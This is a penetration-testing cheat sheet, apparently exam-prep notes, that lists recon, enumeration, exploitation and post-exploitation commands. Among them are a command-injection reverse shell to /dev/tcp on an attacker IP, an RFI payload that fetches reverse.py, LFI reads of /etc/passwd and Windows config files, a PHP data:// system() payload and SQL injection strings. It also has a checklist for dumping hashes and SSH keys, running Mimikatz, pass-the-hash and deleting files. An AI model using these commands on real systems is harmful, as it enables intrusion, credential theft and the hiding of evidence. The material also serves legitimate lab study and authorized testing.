β ffuf -w /opt/SecLists/Discovery/Web-Content/big.txt -u http://ip-address -recursion -recursion-depth 2
β ffuf -w /opt/SecLists/Discovery/Web-Content/raft-large-words.txt -u http://ip-address -e .php,.log,.txt,.pl,.cgi,.pdf,.sh, .jsp, .do, .conf, .config
Fuzz LFI
β ffuf -w /opt/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u http://ip-address β ffuf -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt:FUZZ -u "http://ip-address/blank-page.php?FUZZ=test" -fs 0 β ffuf -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt:FUZZ -u "http://ip-address/evil.php?FUZZ=/etc/passwd"" -fs 0
RPC
β rpcclient --user="" --command=enumprivs -N $ip
β rpcinfo -p $ip
β MS03-026 Microsoft RPC DCOM Interface Overflow (Critical)
SMTP
β nc $ip 25 -vvv
β smtp-user-enum -M RCPT -U /usr/share/wordlists/metasploit/unix_users.txt -t $ip
β smtp-user-enum -M VRFY -U /opt/SecLists/Discovery/names.txt -t $ip
β smtp-user-enum -M EXPN -D example.com /usr/share/wordlists/metasploit/unix_users.txt -t $ip
SNMP
β python3 snmpbrute.py -t $ip -p 161 -f /opt/SecLists/Discovery/SNMP/common-snmp-community-strings.txt
β hydra -P /opt/SecLists/Discovery/SNMP-common-snmp/community-strings.txt -v $ip snmp
β snmpcheck -t $ip -c public
β snmpenum -t $ip
β snmpwalk -v2c -c $community_string $ip >> snmpv2c.txt
β snmpwalk -c public -v1 $ip 1 | grep hrSWRunName | cut -d\*\* -f
β snmpbulkwalk -c public -v2c $ip >> snmpbulk.txt
NFS
β nmap -sV --script=nfs-showmount $ip
β shoutmount -e $ip
LDAP
β ldapsearch -h $ip -p $port -x -s base
β ldapsearch -x -h $ip -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TDL>"
SQL
MSSQL
β impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth
β select * from sys.sysusers;
MYSQL
β mysql -u root -p'root' -h $ip -P 3306
Automated Web Scans
β autorecon $ip --nmap-append="--min-rate=2500" --exclude-tags="top-100-udp-ports" --dirbuster.threads=30 -vv
β nikto -h http://192.168.179.132
β nikto -ask=no -h http://$ip 2>&1
β whatweb -a 3 $ip
β Zap Crawler
β wpscan --url http://192.168.50.244 --enumerate p --plugins-detection aggressive
LFI / RFI
β Windows LFI
β C:\Windows\System32\drivers\etc\hosts
β C:\inetpub\logs\LogFiles\W3SVC1\
β C:\inetpub\wwwroot\web.config
β RFI
β hxxp://target.com/vuln?page=http://192.168.50.51/reverse.py
SQL Injection
β ' OR 1=1 -- 1 UNION SELECT first_name, password FROM users #
Command Injection
β http://target.com/vuln?ping=192.168.50.51 ; bash -i >& /dev/tcp/192.168.50.51/1337 0>&1
/.git/
wget -r http://$ip/.git
git log
git show
git show <commit hash> *80ad5fe45438bb1b9cc5932f56af2e9be7e96046*
git diff
git fetch
Crying for Help
β telnet -d -d -d -d -d $ip $port
β for file in $(ls /opt/SecLists/Discovery/Web-Content); do ffuf -u http://$ip/FUZZ -w /opt/SecLists/Discovery/Web-Content/$file -e .conf,.php,.sh,.txt ; done
β update /etc/host. Ip address with computer name, etc.
β https://securing.dev/posts/hacking-the-oscp-recon/
Service Scanning
WebApp
β ffuf
β gobuster
β Nessus
β Nikto
β wpscan
β dotdotpwn
β view source
β davtest\cadevar
β droopscan
β joomscan
β LFI\RFI Test
Linux\Windows
β snmpwalk -c public -v1 ipaddressΒ 1
β smbclient -L //ipaddress
β enum4linux ipaddress
β showmount -e ipaddress port
β rpcinfo
β Enum4Linux
Anything Else
β nmap scripts (locate *nse* | grep servicename)
β hydra
β MSF Aux Modules
β Download the softward
β page=data://text/plain,<?php%20echo%20system('ls');?>"
β page=php://filter/convert.base64-encode/resource=admin.php
Exploitation β Gather Version Numbes β Searchsploit β Default Creds β Creds Previously Gathered β Download the software
Post Exploitation
Linux
β linux-local-enum.sh
β linuxprivchecker.py
β linux-exploit-suggestor.sh
β unix-privesc-check.py
Windows
β wpc.exe
β windows-exploit-suggestor.py
β windows_privesc_check.py
β windows-privesc-check2.exe
Priv Escalation β acesss internal services (portfwd) β add account β https://guif.re/windowseop - Windows Privilege Escalation β https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS - WinPEAS β Unquoted Paths β DLL Hijacking β Insecure backups
Lateral Movement β Mimikatz - Know the command! β Password Hashes (Hashcat, Pass-The-Hash, Ticket technique) - impacket-psexec, evil-winrm, or xfreerdp
Windows β List of exploits
Linux β sudo su β KernelDB β Searchsploit
Final β Screenshot of IPConfig\WhoamI β Copy proof.txt β Dump hashes β Dump SSH Keys β Delete files
Last updated